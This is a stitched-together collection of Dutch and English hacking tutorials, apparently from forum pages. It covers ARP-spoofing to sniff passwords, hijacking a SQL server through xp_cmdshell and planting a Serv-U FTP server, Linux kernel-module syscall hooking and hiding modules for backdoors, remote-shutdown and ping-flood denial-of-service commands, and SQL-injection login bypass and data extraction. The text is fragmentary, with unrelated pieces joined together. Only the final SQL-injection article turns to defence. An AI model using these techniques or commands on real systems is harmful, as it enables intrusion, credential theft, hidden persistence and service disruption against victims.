Met Visual Basic scripts is het heel makelijk om een virus te maken, hiermee is ooit ook het bekende ''I love you virus'' gemaakt.

In deze tut gaan we leren hoe we onze iPod's, iPhones jailbreaken.

Als er een error komt met c0000005 zorg dan dat de compatibiliteit mode op Windows 95 staat

Tutorial: MAC adress infection
Written by: de ijscoman (Deze word met zijn toestemming op h4ck.nl gezet!)

Like almost every tutorial, its ok to copy and stuff, as long as you give me


This toturial wil explain how MAC adress infection can be used to preform "man
in the middle" attacks on hosts in the same switched LAN.

1. What are MAC adresses, and where are they used for:

You probably already know that every pc connected to a network needs an IP
adress to communicate to others pc's.
This IP adress can be diffrent on the same machine the next time it connects to
the network, and can easely be changed.
The MAC adress however is a static adress that cannot be changed and is always
the same for a networkcard.
You will never find a networkcard that has the same MAC adress as you, becouse
it just doesn't exist.
A MAC adress looks like this: 0A:1B:2C:3D:4E:5F but as i just told you, its
diffrent on each network card.

The MAC adress is used to locate machines on a network, and not the internet.
For example:
When you send a packet to google.nl( and your ip adress
is (and if is subnet mask), your pc will
detect that google.nl is not in the same network as you. because your
network ip range gose from, and google.nl is not in
that range. your packet will be send to the gateway( of
your network.
The next thing that happens is that your pc will ask to ip
what its mac adress is, and send the package to it.
After that, your gateway does exactly the same, etc.

So you see, a MAC adress is needed in all networks, else you wont be able to
know what ip adress belongs to a pc in the network.

2. The diffrence between hubs and switches:

A hub is a Layer 1 device, Layer 1 means the hardware layer, and actually means
that a hub is a very dumb device wich knows nothing about networking.
A switch is a Layer 2 device, and that means it works with MAC adresses, and
knows a lot more about networking.

This is the way a hub works:
Lets say there are 4 pc's connected to a hub, and pc 1 sends something
to the mac adress of pc 2. The packet goes in the hub, and the dumb hub
doesn't know where to send it, becouse it knows nothing about networking.
So the hub just sends the packet to all te pc's in the network, becouse
that includes te pc where it needs to go.

The problem with hubs is that EVERYONE connected to the hub will be able to know
the content of the package. Imagine yourself logging in on your favrite forum,
where your password is plain text readable in the package you send that EVERYONE
connected to the hub will be able to read.

And this is how a switch works:
Lets say there are 4 pc's connected to the switch, and pc 1 sends
something to the mac adress of pc 2. The packet goes in the switch, and
is then only send to the pc witch that mac adress. and not to the others.

The problem with switches is that you are now not able to read the plain text
passwords of other people connected to the switch anymore, becouse you dont
recieve the packets anymore.

3. ARP packets:

ARP packets are used to find the MAC adress of a pc by knowing his IP adress.
When pc 1 knows that pc 2 has IP adress and wants to send him a
packet, he first sends an ARP-request packet to the ip adress. pc 2 recives this
request, and sends an ARP-reply packet to pc 1 containing his MAC adress.
Now pc 1 knows the MAC adress of pc 2 and is now able to directly send packages
to it.

4. The situation:

There are 3 pc's connected to the switch.
pc 1 (IP: MAC: 11:11:11:11:11:11): a mail(pop3) server
pc 2 (IP: MAC: 22:22:22:22:22:22): someone that uses the mailserver
pc 3 (IP: MAC: 33:33:33:33:33:33): the attacker

Pc 2 wants to connect with pc 1 to check its mail.
Pc 2 uses ARP to ask for the MAC adress of pc 1.
Pc 2 can now connect becouse it knows that MAC adress 11:11:11:11:11:11 belongs to
the ip adress
Pc 2 sends username and password to pc 1, and is able to read mail.

5. The attack:

Pc 3 sends a fake ARP package to pc 2, that says:
My ip adress is
And my MAC adress is 33:33:33:33:33:33
The result is that when pc 2 wants to connect to pc 1, it will send all its
packets to pc 3. becouse he now thinks that MAC adress 33:33:33:33:33:33 belongs to
the IP adress

Now pc 3 also sends a fake ARP package to pc 1, that says:
My ip adress is
And my MAC adress is 33:33:33:33:33:33
The result is that when pc 1 wants to send packets to pc 1, it will send all its
packets to pc 3. becouse he now thinks that MAC adress 33:33:33:33:33:33 belongs to
the IP adress

The final step for the attacker is to forward the packet from and to pc 1 and pc 2,
so that they will be able to send and recieve packets from eachother.

The result is that all the packets between pc 1 and pc 2 are now readable by pc 3,
becouse they pass his pc first.

Now it is very easy to sniff out the username and password from the person who uses
pc 2.

Oh, and one more thing...
I am not responsible for any stolen password or information and stuff as the result
of this tutorial.

have fun! :)

Deze tutorial gaat over het hacken van beveiligde sql servers..

1) OSQL.exe Download hier: OSQL.exe
Hacken: Maak in de dir van OSQL.exe een .txt bestandje dat je restore.txt (restore omdat: restore xp_cmdshell) noemd. Zet dit in het bestandje:
use master exec sp_addextendedproc 'xp_cmdshell', 'C:/Program Files/Microsoft SQL Server/MSSQL/Binn/xplog70.dll' go
We zijn zover om de sqlserver van het vresenlijke SQL_error juk te bevrijden (hopenlijk)!!!. Start een DOS vernster en cd naar de dir waar je osql in hebt staan. TYP dan: osql.exe -S -U sa -P "SQLPASSWOORDHIER" -i restore.txt Laat de " staan! Als er geen passwoord is laat je simpelweg geen spatie zien zoals hier: -U sa -P "" -i restore.txt Als alles goed ging zie je iets wat hier op lijkt:
1> 2> 3> 1>
Als je pech hebt (Dan is de SQL_server ECHT secure) Zie je dit:
[Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'xp_cmdshell' in the database.
Nu connect je naar het IP via sqlexec En er is geen SQL_error meer te bekennen. Credits gaan naar

Nu heb je een script gemaakt voor ftp.exe. ftp.exe word geupload in de c:WINNTsystem32.
Ga nu naar de map c:WINNTsystem32.
Om ftp.exe te uploaden typ deze commends in.

ftp -n -s:WINNTsystem32script.txt

hacking / tutiorals / hack | Pzonline (1)

Nu freezed het programma voor een tijdje
Daarna zijn de programma’s geupload.
Typ nu deze command in om ServUDaemon te installeren:

c:[dir_with_ServUDaemon]ServUDaemon.exe /i

hacking / tutiorals / hack | Pzonline (2)

Nu ServUDaemon geinstalleerd is.
Maar om de serv-u ftp server te starten moet je deze command intypen:

c:net start serv-u

hacking / tutiorals / hack | Pzonline (3)

Je krijgt nu een bericht of Serv-U is gestart of niet.
Zo niet ga naar Deel 4: Problemen oplossen.


Deel 3 - Protecting

Changing the SQL-server pass:
Verander de extencie met SQLexec naar "%s".

Typ deze command

sp_password password, 'new_password', 'username'

pasword: Het huidige SQL password, NULL is [blank password]
username: Het huidige SQL username.
new_password: Hier je nieuwe paswoord.


sp_password NULL, 'hacked', 'sa'

Maar als de FTP SQL-services gebruikt zal deze zich afsluiten en zal je snel gepakt zijn L!

Hernoem ftp.exe en tftp.exe:
Met de volgende commands hernoem je ftp.exe en tftp.exe:

cd winntsystem32
move ftp.exe sqlupdate.exe
move tftp.exe directsql.exe
del c:ftp.exe /s
del c:tftp.exe /s

hacking / tutiorals / hack | Pzonline (4)
Vul ze allemaal in 1 voor een zoals in de bovenstaande screenshot.

Nu ftp.exe = sqlupdate.exe
en tftp.exe = directsql.exe

Ja kan ook andere namen verzinnen maar ik heb voor sqlupdate en directsql gekozen.


Deel 4 - Problemen oplossen

Wil Serv-U niet starten:
Try this command to install the ServUDaemon.exe again.

c:/[dir_met_ServUDaemon]/ServUDaemon.exe /i c:/[dir_met_ServUDaemon]/ServUDaemon.ini

Daarna typ je "net start serv-u".

Kernel hacking
* Disclaimer
* Inleiding
* System calls
* Loadable kernel modules
* Verbergen van modules
* Afsluiting
* Bronnen

- Disclaimer

Het kan zijn dat als je informatie uit de artikel gaat uitvoeren op je OS en
je gaat zelf dingen uit proberen met betrekking tot kernel modules en dergelijke
dan is het mogelijk dat je dingen verkeerd doet, zodat je kernel (tijdelijk?)
niet meer goed werkt. Alles is dus op eigen risico en ik ben nergens voor

- Inleiding

Zoals velen van jullie wel weten bestaan er mogelijkheden om de kernel van een
OS te hacken. Dit is natuurlijk een zeer gevaarlijke attack, want wat moet je
als sysop als je je eigen kernel niet eens meer kan vertrouwen? Een kernel kan
je echter pas hacken als je in een systeem bent binnengedrongen en root hebt
verkregen. Maar hoe goed je je systeem ook beveiligd, er kan altijd iemand
binnenkomen. En hoe slimmer de hacker is die jouw geweldige beveiliging omzeild,
hoe groter de kans dat hij je kernel hackt om later nog eens terug op bezoek
te kunnen komen. Deze worden vaak als een kernelmodule gecompileerd en geinstal-
leerd, terwijl ze op een vernuftige manier in elkaar gezet zijn, zodat je ook
met lsmod de desbetreffende backdoor niet kan zien. In dit artikel zal ik eens
wat dieper ingaan op het hacken van de kernel. Alles is van toepassing op de
Linux-kernel, maar de principes zijn hetzelfde voor alle UNIX-based systemen. Je
zult dan wel even uit moeten vogelen welke functies de kernel gebruikt om
systemcalls uit te voeren. Dit gaat natuurlijk het makkelijkst als je de sources
van de kernel van je OS hebt. In principe zijn er ook wel slimme backdoors te
schrijven voor windows, maar dit kost heel veel tijd en je zult je door alle
assembly-sources van Windows 9x/2K/ME heen moeten worstelen. :)

- System calls

Voordat we kunnen bekijken wat system calls eigenlijk zijn moet er eerst wat
uitgelegd worden over hoe het geheugen in Linux is ingedeeld. Het geheugen is
in twee gedeeltes verdeeld; kernelspace en userspace. Een programma kan niet
naar de kernelspace schrijven, omdat die voor de kernel is gereserveerd *doh*.
Ook kun je niet zonder meer de kernel access tot het usergeheugen laten geven.
Als je een system call uitvoert doet de kernel enkele dingen. Hij zet DS en ES
(geheugenpointers, voor meer info lees wat over Assembler) zodat het geheugen
wijst naar het kernelsegment. Hierna zet het FS en die wijst dan naar het
usersegment in het geheugen. Vanuit de kernelspace kun je dus toch het stukje
geheugen dat gereserveerd is voor de user aanroepen.

Elk programma dat je in C hebt geschreven gebruikt libc. Dit is een library die
alle basisfuncties, die je nodig hebt om te programmeren, vastlegd. In feite
zijn bijna alle functies in libc gebaseerd op de onderliggende system calls.
Dit zijn de simpelste kernelfuncties die een userprogramma kan aanroepen.
Alle system calls van een OS zijn geimplementeerd in de kernel zelf of in kernel
modules die je pas in het geheugen laat als je ze nodig hebt (insmod, rmmod,

In Linux zijn de system calls geimplementeerd door door een interrupt. Deze is
'int 0x80'. Als je deze instructie uitvoert wordt de controle aan de kernel
overgedragen met behulp van de functie _system_call(). Deze functie saved alle
registers en daarna wordt de inhoud van het %eax register gecheckt en vergeleken
met de zogeheten 'global system calls'-table. In deze tabel staan alle system
calls en hun geheugenadressen. Als de system call in %eax niet in de tabel staat
retouneert _system_call een error. In alle andere gevallen zal de kernel het
geheugenadres dat in de tabel stond achter de system call uitvoeren. Hier volgt
even een klein voorbeeldje dat de system call aanroept met een system call
die niet bestaat, zodat de kernel een foutmelding zal geven! Let er wel op dat
je bij jouw systeem wel een waarde voor 'movl $165,%eax' geeft die niet bestaat,
want anders kan je kernel hele rare dingen gaan doen. Voor een overzicht van
alle system calls kijk in: "/usr/include/asm/unistd.h". Daar staan ze tenminste
bij mij. Anders kan je OS ze ook in: "/usr/include/sys/syscall.h" hebben staan.
Daar staan alle gedefineerde system calls van je OS in. Laten we eens gaan
kijken wat er gebeurd als we een systemcall uit proberen die dus NIET bestaat!

[gorny@localhost artikel]$ vi ./syscall1.c
/* Voorbeeld van een systemcall */

extern void *sys_call_table[];

functie() {
/* wel gecheckt of systemcall 165 NIET bestaat? */
"movl $165,%eax
int $0x80");

main() {
errno = functie();
perror("Invalid syscall");
[gorny@localhost artikel]$ gcc -O2 -o syscall1 ./syscall1.c
[gorny@localhost artikel]$ ./syscall1
Invalid syscall: Unknown error 4294967282
[gorny@localhost artikel]$ su
[root@localhost artikel]# ./syscall1
Invalid syscall: Unknown error 4294967282
[root@localhost artikel]# exit
[gorny@localhost artikel]$

En zoals we al verwacht hadden geeft de kernel een keurig nette foutmelding.
Normaal zal de controle terug gegeven worden gegeven aan de gespecificeerde
systemcall. Hierna roept _system_call() de functie _ret_from_sys_call() aan,
om verschillende informatie te checken en uiteindelijk weer terug te keren
naar het usersegment in het geheugen. Zoals je ziet, maakt het ook geen ver-
schil of je het programmaatje uitvoert als gewone user of als root.
NOTE: Om de een of andere vage reden geeft het voorbeeldproggie een core-dump
als ik hem gecompiled heb met de optimatie-optie '-O3'. Vraag me niet waarom,
want '-O1' en '-O2' werken wel gewoon :(

- Loadable kernel modules

Als je nou zelf je eigen system calls wilt maken dan kun je dit doen door
de source van je kernel handmatig aan te passen en een nieuwe kernel te
compilen. Het is echter heel wat makkelijker als je een loadable kernel
module gebruikt. Dit betekent domweg dat het een objectfile is die gelinked
zal worden als de kernel de module nodig heeft. Hierdoor kun je ook een kleinere
kernel krijgen, door alles wat je niet vaak nodig hebt, als aparte module te
compileren. In feite is het enige wat je moet doen in je module om system calls
toe te voegen is het veranderen van de sys_call_table array die al eerder is
beschreven. Elke loadable kernel module (lkm) heeft in ieder geval de functies;

int init_module(void)
void cleanup_module(void)

De eerste functie wordt aangeroepen bij het laden van de module en de tweede bij
(je raadt het al :) het unloaden van de module. Nog even een waarschuwing voor
mensen die nu hun eigen loadable kernel modules willen gaan schrijven. Begrijp
goed dat je met kernel-code bezig bent en dat je hele systeem in de war kan
lopen als je echt rare system calls gaat uitvoeren. Let dus goed op en zorg
ervoor dat de code goed is voordat je de gecompilede code gaat uitvoeren. Een
ander nadeel van kernel modules is dat ze niet libc kunnen gebruiken. Ze moeten
direct via system calls hun opdrachten uitvoeren. Hier bestaat ook een handige
macro voor genaamd _syscallX(), maar het kan ook gewoon met de sys_call_table
array. Ook is het een goed idee om je module te compileren met een regel als:

[gorny@localhost artikel]$ gcc -c -O3 blaat.c

Met de optie O3 wordt namelijk alles geoptimaliseerd en duurt het compilen
wat langer, maar uiteindelijk levert het wel wat snelheidswinst op :) Je krijgt
dan een module genaamd blaat.o. Deze kun je laden met 'insmod blaat.o' en dan
is je lkm actief. Wil je hem weer uit het geheugen laden dan doe je 'rmmod' en
voor een overzicht van alle geladen kernel modules typ je 'lsmod'. Laten we
eens een voorbeeld module gaan bekijken. Deze heb ik gehaald uit het artikel
van plaguez.

#define MODULE
#define __KERNEL__
#ifdef MODULE

int errno;

/* Hier wordt een pointer gedefineerd die naar de oude setreuid */
int (*o_setreuid) (uid_t, uid_t);

/* In de onderstaande array staan de systemcalls en pointers */
extern void *sys_call_table[];

int new_setreuid(uid_t ruid, uid_t euid)
printk("uid %i trying to seteuid to euid=%i", current->uid, euid);
return (*o_setreuid) (ruid, euid);

int init_module(void)
o_setreuid = sys_call_table[SYS_setreuid];
sys_call_table[SYS_setreuid] = (void *) new_setreuid;
printk("swatch loaded.\n");
return 0;

void cleanup_module(void)
sys_call_table[SYS_setreuid] = o_setreuid;
printk("swatch unloaded.\n");

Je compileert deze module met 'gcc -c -O3 plaguez.c'.
Wat doet deze module eigenlijk precies? Als hij wordt aangeroepen en in het
geheugen wordt geladen zal de pointer naar de oude setreuid functie opgeslagen
worden in o_setreuid. Hierna wordt de sys_call_table gewijzigd zodat de
systemcall 'setreuid' nu wijst naar de functie 'new_setreuid'. De informatie
wordt dus onderschept en daarna wordt pas de goede functie aangeroepen. Bij het
unloaden van de module wordt alle informatie weer terug gezet zoals het was en
zal de system call 'setreuid' weer gewoon wijzen naar de goede functie. Zoals
je hier ook duidelijk ziet kun je niet de gewone printf-functie gebruiken van
libc. Daarom wordt hier de functie printk gebruikt die wel aangeroepen kan
worden door loadable kernel modules.

- Verbergen van modules

Maar natuurlijk zal de module ook verborgen moeten worden. Anders is de module
veel te gauw gespot en daar heb je hem niet voor geinstalleerd :). Dit kan ge-
daan worden op verschillende manieren. Een mogelijkheid is om '/proc/modules'
te wijzigen zodra een programma die file probeert te lezen, maar dit is erg
moeilijk om te programmeren en het schijnt dat je dan met:
'dd if=/proc/modules bs=1' wel gewoon de file kan lezen inclusief de naam van de
module die je wilt verbergen. Er is wel een oplossing. De module lijst wordt
niet direct geëxporteerd vanuit de kernel zodat er geen manier is om deze lijst
direct aan te spreken. Dit laatste kan echter alleen als sys_init_module() wordt
aangeroepen, want dat is namelijk de module die onze eigen lkm moet gaan aan-
roepen, dus die moet toegang hebben tot de moduleinfolijst. Hierbij moeten we
er wel van uitgaan dat GCC de registers niet verneukt tussen het aanroepen van
'sys_init_module' en het aanroepen van 'init_module()'. Dat maakt het mogelijk
om na te gaan wat het register was waarin de moduleinfolijst begon. De module-
lijsten zijn opgeslagen in een register struct van het gedefineerd type module.
De naam van deze struct is mp. Je kan dan nagaan wat het adres is van 1 van de
items van de struct. Als je dan een stukje code als het onderstaande schrijft
in je lkm dan zal de module niet getoond worden in /proc/modules, omdat de
kernel denkt dat het een kernel module is, aangezien die ook geen referenties
en een naam hebben. Bij het onderstaande stukje wordt er wel vanuit gegaan
dat het adres van die struct is opgeslagen in %ebx. Dit zul je dus wel even
moeten checken om daar het goede register in te vullen.

int init_module()
register struct module *mp asm("%ebx");
/* De rest van je code */

Naast het verbergen van de module zelf zijn er trojans geschreven met allerlei
opties. Zoals: PID-hiders, execve redirection, file hiders, socket recvfrom()
en gemodificeerde setuid()-calls. Vooral itf.c van plaguez heeft veel opties.
Maar het is natuurlijk wel lame om niet je eigen trojans te gebruiken, maar die
van anderen (zie artikel van Nynex in H4H-0C over lameheid :). Bovendien
leer je gigantisch veel van het zelf schrijven van je trojans en tools.
Als je van het zelf maken van je programma's niets leert dan leer je nergens wat
van. Kun je beter je computer verkopen ofzo en postzegels gaan verzamelen :)

Ik nu uitleggen hoe ge op een gemakkelijke manier iemand zen p.c naar de zak kunt doen ( overbelasten) u kan het doen met een port nuker maar ik ga het uitleggen zonder programmas : Eerst zoek je het i.p adres van uw slachtoffer( dat is niet moeilijk )
Daarnaa ga je naar start en dan uitvoeren en typ dan "cmd"

Hij sluit nu de computer af van Typhierdecomputernaam die je zal moeten veranderen in de computer naam van je collega's bijvoorbeeld.

Let op: Ik heb een fout gemaakt en dit is verbeterd dus als het eerst niet lukte misschien nu wel fout: je moet altijd \\ voor een computernaam zetten.

Ping of death

Simple dos attack op sites(ook wel ping of death genoemd)
Het op deze werkt niet altijd doordat sites
beveiligd kunnen zijn of dat je internetverbinding laag is of dat de server
heel veel request kan beantwoorden

Oke open cmd --> en typ dit:

ping Naamvandesitehier -t -l 15000

met die 15000 kun je een beetje kloten want hoe sneller je verbinding is
hoe hoger je die kan en maken en meer kans tot succes kan leiden.
Dus bij een hoge verbindingssnelheid typ dan dit in:

ping Naamvandesitehier -t -l 65510

Hacken doe je zo!

Omdat inbreken op computers via e-mail steeds
lastiger wordt, proberen hackers het tegenwoordig
meer en meer via het web door middel van
zogenaamde SQL injection attacks. De auteur
laat zien hoe eenvoudig dergelijke aanvallen
uit te voeren zijn.

Tegenwoordig komen we niet zomaar meer via het
e-mailsysteem binnen op een computer. Dat wil
zeggen dat we geen gekke e-mailtjes meer kunnen
sturen om daarmee in te breken op een computer.
Daarom probeert men het tegenwoordig meer en
meer via het web. Een hiervoor gebruikte
techniek die verbazend eenvoudig is, gaat schuil
achter de illustere naam SQL injection attack.
En deze techniek werkt ook als systeembeheerders
elke security-patch meteen implementeren, de
nieuwste versies van de onderliggende
databasesysteemsoftware hebben, enzovoort.
Dit komt omdat men tegenwoordig niet meer
probeert via lekken in een databasemanagementsysteem
of besturingssysteem binnen te komen, maar via
de voordeur: de webapplicatie zelf.

Wat is er zoal nodig voor een SQL injection
attack? Ten eerste een willekeurige webbrowser.
En ten tweede verstand van gegevensverwerking op
elke universiteit te bekomen. Hier volgt een spoedcursus.

SQL betekent Standard Query Language; het is
een taal waarmee we alles met gegevens kunnen
doen: gegevens creeren, opvragen, manipuleren
en weggooien. Hacken klinkt als een soort
zwarte magie, alleen weggelegd voor diegenen
die de diepste diepten van een computer kunnen
beroeren. Vandaar wat 'hacksuele' voorlichting.
Het woord injection staat voor het zelf inbrengen
van SQL-commando's door gebruik te maken van
een onachtzaam gebouwde webapplicatie.

Een attack uitvoeren
Laten we eens kijken naar de magie van het
inloggen; de realiteit is veel simpeler dan u
durft te vermoeden. Op vrijwel elke website
zijn tegenwoordig logindialogen te vinden.
Gelukkig hebben we bij slechte software helemaal
geen login nodig om binnen te komen. Het eerste
wat we doen, is checken of de website slecht
ontworpen is. Dat is te testen door een apostrof
of het woord OR in te tikken en dan te kijken
wat er gebeurt. Als er dan een foutmelding
verschijnt die door het databasemanagementsysteem
is gegenereerd, is de applicatie mogelijk
kwetsbaar. De foutmelding geeft namelijk aan
dat een SQL-commando incorrect was en is zo
vriendelijk ons daarop te wijzen: Unclosed
quotation mark before character string ")'.

We weten nu twee dingen: ten eerste dat we een
SQL-commando hebben kunnen geven, dus onze
eerste SQL-injection is een feit; ten tweede
dat het een incorrect commando was, met een
vriendelijke suggestie dat we voortaan wel een
afsluitend aanhalingsteken moeten gebruiken.
Al doende kunnen we dan allerlei SQL-commando's
gaan injecteren.

Inloggen zonder wachtwoord
Stel dat we voorbij een loginprocedure willen
komen. De simpelste methode, die verbazingwekkend
vaak werkt, gaat als volgt. Neem zowel voor
de loginnaam als het wachtwoord deze incantatie:
` OR "1=1' (of een variant daarvan). Als we
geluk hebben, zijn we dan al binnen. Hoe? De
webapplicatie test normaliter of de loginnaam
klopt en bij het wachtwoord hoort. Alleen nu
hebben we wat extra SQL geinjecteerd zodat de
applicatie een andere query uitvoert dan die
de amateur bijvoorbeeld met de volgende code
heeft bedoeld:

LoginName = ` " & strLoginName & " `
Password = ` " & strPassword & " ` "

De variabelen strLoginName en strPassword worden
vervangen door onze toverformule, wat leidt tot het
volgende SQL-commando dat zal worden uitgevoerd:

LoginName = `' OR `'1=1''
Password = `' OR `'1=1''

Dit betekent dat de WHERE-conditie altijd WAAR
is. Kijk maar: de LoginName wordt vergeleken
met een lege string die wordt gerepresenteerd
door twee aanhalingstekens, niet WAAR dus.
Maar we hebben ook een altijd ware bewering
geinjecteerd: 1=1. En de OR is inclusief,
wat zoveel betekent dat als een van de twee
beweringen WAAR is, het geheel WAAR is. Dus
de tweede regel code levert WAAR op. Idem voor
de vierde regel code, en WAAR AND WAAR is weer
WAAR. Dus de test om in te loggen is geslaagd,
ondanks het feit dat we geen enkele loginnaam
of wachtwoord hebben ingetoetst. Nu hebben we
dus toegang tot het beschermde gedeelte van de

Toegang tot alle gegevens
Laten we de zaak iets ingewikkelder maken. We
willen toegang tot alle gegevens en bij onachtzaam
gemaakte applicaties is dat een kwestie van
even doorwerken. Tegenwoordig zien we allerlei
ingewikkelde webadressen met vraagtekens en
cijfercodes erin, adressen die eindigen op
bijvoorbeeld default.asp?id=10. Bij slecht
ontworpen software kunnen we daarachter
gemakkelijk onze eigen commando's toevoegen.
Na de 10 in het webadres voeren we in: UNION
Een hele mond vol, maar dit betekent niets
anders dan: voer het bedoelde commando met het
getal 10 gewoon uit, maar combineer dat met
ons commando dat de eerste naam van de tabel
moet geven die op de daarvoor bestemde plek
staat van elk gegevensverwerkend systeem.
Handig, die open standaarden! Dit geeft vrijwel
zeker weer een foutmelding, maar in die
foutmelding staat wel de gevraagde tabelnaam.

Hoe zit dat? Ons commando hoest de naam van de
tabel gewoon op, maar die naam is geen getal,
dus als SQL dat combineert (via UNION) met het
getal 10, zijn we appels met peren aan het
vergelijken en dat is fout. Er volgt een
foutmelding die ons daarop wijst: Syntax error
converting the nvarchar value `naam' to a column
of data type int. En de naam tussen aanhalingstekens
is net wat we zochten.

Communicatie via foutmeldingen
Van die fout leren we de naam van de eerste
tabel van het systeem. Nu de tweede naam.
Het is een variatie op hetzelfde thema: voeg
aan de bovenstaande UNION nog een extra dosis
toe, namelijk "WHERE TABLE_NAME NOT IN (`naam').
Dat geeft weer een foutmelding, want 10 is nog
steeds een getal en de volgende tabelnaam is
nog steeds geen getal. In de foutmelding vinden
we dan de tweede naam. Op die manier kunnen
we doorgaan met injecteren tot we alle tabelnamen
hebben. Dit simpele trucje heet ook wel database
footprinting. Wat u nu in werking ziet, is
het principe van communicatie met de webapplicatie
via foutmeldingen. Dat is een mooie manier om
dingen te weten te komen die anders niet
prijsgegeven worden.

Een database is om dingen op te zoeken, ook
als je niet helemaal weet hoe alles ook weer
gespeld was. We willen bijvoorbeeld een tabel
vinden waarin de loginnamen van gebruikers
staan. Dan voegen we een ander stukje code,
dat omwille van de leesbaarheid iets versimpeld
is, aan onze injectie toe: WHERE TABLE_NAME
LIKE `login'. Dit zal weer een foutmelding
opleveren: Syntax error converting the nvarchar
value `admin_login' to a column of data type
int. De naam van de tabel waarin hoogstwaarschijnlijk
de logingegevens van de gegevensbeheerder staan,
is dus admin_login. We dienen weer een
SQL-injectie toe: UNION SELECT TOP 1 login_name
FROM admin_login. Ook deze zal weer een
foutmelding geven, omdat die naam geen getal
is: Syntax error converting the nvarchar value
`B1FF' to a column of data type int. Er is
kennelijk een gegevensbeheerder met loginnaam

We zijn nu halverwege, net als de kluizenexpert
die laatst een oude kluis van De Nederlandsche
Bank in twee rondes wist open te krijgen door
te luisteren naar onregelmatigheden in de
cijfersloten. Wij luisteren ook naar
onregelmatigheden van de webapplicatie door
middel van een nieuwe injectie: UNION SELECT
TOP 1 password FROM admin_login WHERE
login_name='B1FF'. Weer een foutmelding: Syntax
error converting the nvarchar value `DEADBEEF'
to a column of data type int.

Eigen account maken
Nu zouden we kunnen inloggen met de naam B1FF
en het wachtwoord DEADBEEF, maar het is niet
zo handig om dat te doen. Beter is het om een
eigen account aan te maken, want B1FF zal vroeg
of laat merken dat er iets aan de hand is. Om
een eigen account te maken moeten we weten
welke kolommen er in de tabel admin_login
zitten. Dat is fase twee van database
footprinting: alle kolommen van een tabel boven
water krijgen. Injecteer dit: UNION SELECT TOP 1
WHERE TABLE_NAME= `admin_login'. Dat geeft
weer een foutmelding: Syntax error converting
the nvarchar value `login_id' to a column of
data type int. Daarna kunnen we weer de volgende
melding genereren door een WHERE-conditie toe
te voegen, en zo gaat het verder.

Gewapend met precieze kennis van de databasestructuur
van de webapplicatie kunnen we dan met een
SQL-injectie een INSERT-commando geven dat ons
als gegevensbeheerder toevoegt. En dan kunnen
we aan het werk: alle data zijn tot onze
beschikking, we kunnen gegevens toevoegen,
ophalen, veranderen, weggooien, enzovoort. En
dat alles met een willekeurige browser en wat
`hacksuele' voorlichting.

De proef op de som
Karin Spaink (2005) publiceerde onlangs in de
Volkskrant dat ze via SQL injection twee weken
lang 1,2 miljoen patientengegevens tot haar
beschikking had, zonder dat iemand dat in het
ziekenhuis was opgevallen---namen, adressen,
telefoonnummers, patientnummers, polisnummers,
geslacht, geboortedatum, lengte, gewicht, dood
of levend, inclusief een lijst met patienten
die een besmettelijke ziekte hadden.

Het echte probleem


Het echte probleem is natuurlijk de webapplicatie
en niet de hacker, want zoals u ziet: een kind
kan de was doen. Als het nieuwe software
betreft, is die gemaakt door mensen die de
beginselen van het maken van productiesoftware
niet machtig zijn. Bij de absolute basiskennis
hoort namelijk dat je altijd alle input moet
valideren en alleen die input moet doorlaten
waarvan jij wilt dat die doorgelaten wordt.
Dat voorkomt crashen, dataverlies en SQL
injection attacks.

Maar niet alle software is nieuw. Sterker nog,
meer dan 60 procent van alle data die via het
web toegankelijk zijn, staan op een mainframe.
Die data zijn ook vaak waardevol: meer dan 95
procent van de gegevens in de financiele sector
en de verzekeringssector wordt met Cobol en
embedded SQL verwerkt. Die software is niet
ontworpen om dit soort aanvallen af te slaan.
En als men achteraf bedenkt dat alle input nog
even moet worden gevalideerd, is het een verloren
race, want dat ontwerp je er niet nog even in.
Het is dan ook geen verrassing dat we onlangs
berichten hoorden van diefstal van miljoenen
creditcardgegevens. Nu spreekt hacken tot de
verbeelding, maar het echte probleem is dat
een groot percentage van de fraude afkomstig
is van eigen personeel. Binnen een organisatie
heeft men gemakkelijk toegang tot intranetapplicaties
en personeel kan via de genoemde SQL-injectionprincipes
ongeautoriseerd toegang krijgen tot allerlei
gegevens. Vaker nog is de beveiliging intern
helemaal afwezig en loopt men dus gewoon binnen
bij zo'n systeem. En we weten dat personeel
dat data invoert gemakkelijk omkoopbaar is:
voor 25 dollar waren jarenlang de complete
salarisgegevens van de laatste tien jaar van
een toekomstige werknemer op te vragen bij
belastingmedewerkers, zodat je heel scherpe
salarisonderhandelingen kon voeren.

Wat zeer verontrustend is aan dit soort zaken
is dat besluitvormers elke poging om privacy
en security aan de kaak te stellen bagatelliseren
(Verhoef, 2005). Zo stuurde het gehackte
ziekenhuis voor de evaluatie een systeembeheerder,
waar het hoogste management meer op zijn plaats
was geweest. Men doet dit af als een computerfoutje
dat ZE nog even gaan oplossen. En alle deadlines
blijven overeind, want in 99 procent van de
gevallen gaat het goed.

Ten eerste: het gaat hier niet om een
computerfoutje. We hebben het hier over inherent
volkomen verkeerd ontworpen software, door
mensen zonder benul van de meest elementaire
softwareengineeringprincipes, die bewezen hebben
alle elementaire kennis te ontberen die nodig
is voor de productie van veilige privacybeschermende
gegevensverwerkende systemen. Dat is de fout
van de besluitvormers die kiezen voor de laagste
prijs en die geen idee hebben van de werkelijke
eisen die aan hun systemen gesteld moeten

Ten tweede: ZE gaan helemaal niets oplossen!
ZE hebben allereerst uiterst belangrijke
ontwerpbeslissingen gemist. En het is schier
onmogelijk om dergelijke ingrijpende
ontwerpbeslissingen achteraf even weg te poetsen.
Laat staan door amateurs. Ga maar na:
inputvalidatie komt overal in systemen voor.
Tegenwoordig is het merendeel van administratieve
systemen gewijd aan de gebruikersinterface en
daarin komt input en output van gegevens
veelvuldig voor. Op elke plek, in elk veldje,
bij elk vraagje dat het systeem zou kunnen
stellen aan een gebruiker, moet je iets, en
ook nog op plekken waar je dacht dat je niets
vroeg. Ergo, het hele ontwerp moet op z'n kop.
Dat lukt ZE dus niet. Maar besluitvormers zijn
dusdanig amateuristisch dat ze het verschil
tussen een beunhaas en een gelicentieerde
it-professionali niet zien.

Ten derde: de meeste besluitvormers hebben geen
bal verstand van het managen van it. Kijk maar
naar de deadlines die ze uitkramen: 1 januari
2006, voor de Kerst, 5 december krijg je een
cadeautje. Het gaat altijd om ronde of bijzondere
datums. Dat noem ik fantasy deadlines. Als
je niet de meest geeigende productiemethode
kunt gebruiken, wordt productie altijd duurder
en slechter, dat is algemeen bekend. Ook bij
it: in 1984 is een wetmatigheid ontdekt die
laat zien dat van te veel it-werk in te korte
tijd de kosten explosief stijgen en daarmee
ook de risico's. Besluitvormers die aan
deadlines vasthouden terwijl de hele tent
